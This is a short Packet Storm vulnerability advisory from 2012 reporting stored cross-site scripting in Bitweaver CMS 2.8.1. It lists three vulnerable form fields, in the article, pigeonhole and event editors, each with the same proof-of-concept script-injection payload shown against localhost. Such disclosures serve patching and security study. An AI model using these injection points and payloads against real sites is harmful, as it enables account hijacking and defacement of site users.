Bitweaver CMS 2.8.1 Cross Site Scripting

2012-06-22T00:00:00
ID PACKETSTORM:114041
Type packetstorm
Reporter $1l3n7 @$$@$$17
Modified 2012-06-22T00:00:00

Description

                                        
                                            ` ____/\______.__ ________ _________ _____ ____/\__  
____/\__ _____ ____/\__ ____/\______  
/ / /_/_ | | \_____ \ ___\______ \ / ___ \/ / /_// /  
/_/ / ___ \/ / /_// / /_/_ | ____  
\__/ / \ | | | _(__ < / \ / / / / ._\ \__/ / \ \__/ / \  
/ / ._\ \__/ / \ \__/ / \ | |/ \  
/ / / \| | |__/ \ | \/ / < \_____/ / / \/ / /  
< \_____/ / / \/ / / \| | | \  
/_/ /__ /|___|____/______ /___| /____/ \_____\/_/ /__ /_/ /__  
/\_____\/_/ /__ /_/ /__ /|___|___| /  
\/ \/ \/ \/ \/ \/ \/ \/  
\/ \/ \/ \/ \/  
  
  
------------------------------------------------------------------------------  
  
-------------------------------------------------------------------  
  
  
  
TITLE: Bitweaver CMS Multiple stored XSS  
Vendor: Bitweaver CMS  
Author: $1l3n7 @$$@$$17  
Email: sil3ntb0t@gmail.com  
Download Link:  
https://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download  
  
Versions: 2.8.1  
Tested on: Windows7  
  
------------------------------------------------------------------------------  
  
  
------------------------------------------------------------------------------  
Description : Bitweaver is an application framework for content  
management.It is a  
fully functional web application and CMS.It is truly open source,  
community driven, object oriented, and written in PHP. Use Smarty  
Templates and ADOdb to support many databases including Postgres,  
  
Firebird, Oracle, and MySQL.  
DEMO:  
A)Persistent XSS  
  
http://localhost/bitweaver/articles/index.php  
  
DEMO:  
  
http://localhost/bitweaver/articles/edit.php  
  
  
1: In Author Name Field  
  
POST DATA= "'-->><script>alert(0)</script>  
  
2:  
http://localhost/bitweaver/pigeonholes/edit_pigeonholes.php?action=create  
  
In title field  
  
POST DATA= "'-->><script>alert(0)</script>  
  
3:  
  
http://localhost/bitweaver/events/edit.php  
  
In title field  
  
POST DATA= "'-->><script>alert(0)</script>  
  
  
  
  
----------------------------------------------------------------------------  
  
gr33t1ngs and ShOuTZ to r007k17-w and all my friends..  
`